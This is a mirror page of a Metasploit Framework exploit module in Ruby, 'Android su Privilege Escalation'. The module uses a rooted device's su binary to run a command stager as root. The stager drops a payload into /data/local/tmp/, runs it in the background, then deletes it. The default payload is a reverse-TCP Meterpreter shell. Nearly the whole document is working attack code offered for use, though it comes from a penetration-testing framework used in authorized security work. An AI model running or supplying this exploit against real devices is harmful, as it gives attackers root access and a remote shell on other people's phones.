CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/android/local/su_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ManualRanking

8


9
  include Msf::Exploit::CmdStager

10
  include Msf::Post::File

11
  include Msf::Post::Android::Priv

12


13
  def initialize(info={})

14
    super( update_info( info, {

15
      'Name'           => "Android 'su' Privilege Escalation",

16
      'Description'    => %q{

17
          This module uses the su binary present on rooted devices to run

18
          a payload as root.

19


20
          A rooted Android device will contain a su binary (often linked with

21
          an application) that allows the user to run commands as root.

22
          This module will use the su binary to execute a command stager

23
          as root. The command stager will write a payload binary to a

24
          temporary directory, make it executable, execute it in the background,

25
          and finally delete the executable.

26


27
          On most devices the su binary will pop-up a prompt on the device

28
          asking the user for permission.

29
      },

30
      'Author'         => 'timwr',

31
      'License'        => MSF_LICENSE,

32
      'DisclosureDate' => '2017-08-31',

33
      'SessionTypes'   => [ 'meterpreter', 'shell' ],

34
      'Platform'       => [ 'android', 'linux' ],

35
      'Arch'           => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],

36
      'Targets'        => [

37
        ['aarch64',{'Arch' => ARCH_AARCH64}],

38
        ['armle',  {'Arch' => ARCH_ARMLE}],

39
        ['x86',    {'Arch' => ARCH_X86}],

40
        ['x64',    {'Arch' => ARCH_X64}],

41
        ['mipsle', {'Arch' => ARCH_MIPSLE}]

42
      ],

43
      'DefaultOptions' => {

44
        'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',

45
        'WfsDelay' => 5,

46
      },

47
      'DefaultTarget'  => 0,

48
      }

49
    ))

50
    register_options([

51
      OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),

52
      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),

53
    ])

54
  end

55


56
  def base_dir

57
    datastore['WritableDir'].to_s

58
  end

59


60
  def su_bin

61
    datastore['SU_BINARY'].to_s

62
  end

63


64
  def exploit

65
    if is_root?

66
      fail_with Failure::BadConfig, 'Session already has root privileges'

67
    end

68


69
    linemax = 4088 - su_bin.size

70
    execute_cmdstager({

71
      flavor: :echo,

72
      enc_format: :octal,

73
      prefix: '\\\\0',

74
      temp: base_dir,

75
      linemax: linemax,

76
      background: true,

77
    })

78
  end

79


80
  def execute_command(cmd, opts)

81
    su_cmd = "#{su_bin} -c '#{cmd}'"

82
    cmd_exec(su_cmd)

83
  end

84


85
end

86


87


88